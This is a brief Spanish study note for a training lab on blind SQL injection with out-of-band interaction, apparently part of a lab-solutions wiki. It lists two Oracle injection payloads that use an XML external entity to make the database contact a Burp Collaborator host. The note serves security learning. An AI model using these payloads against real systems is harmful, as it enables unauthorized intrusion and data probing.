👑Laboratorio: Inyección SQL ciega con interacción fuera de banda
Usando tecnicas fuera de banda.
'+UNION+SELECT+EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "<http://BURP-COLLABORATOR-SUBDOMAIN/>"> %remote;]>'),'/l') FROM dual--
'+UNION+SELECT+EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "https:0efdymgw1o5w9inae8mg4dfrgim9ay.burpcollaborator.net"> %remote;]>'),'/l') FROM dual--
#el segundo es con un nombre de dominio X de ejemplo, pero no sirve. 
PreviousLaboratorio: Inyección SQL ciega con retardos de tiempo y recuperación de informaciónNextLaboratorio: ataque de inyección SQL, consulta del tipo y versión de la base de datos en Oracle
Last updated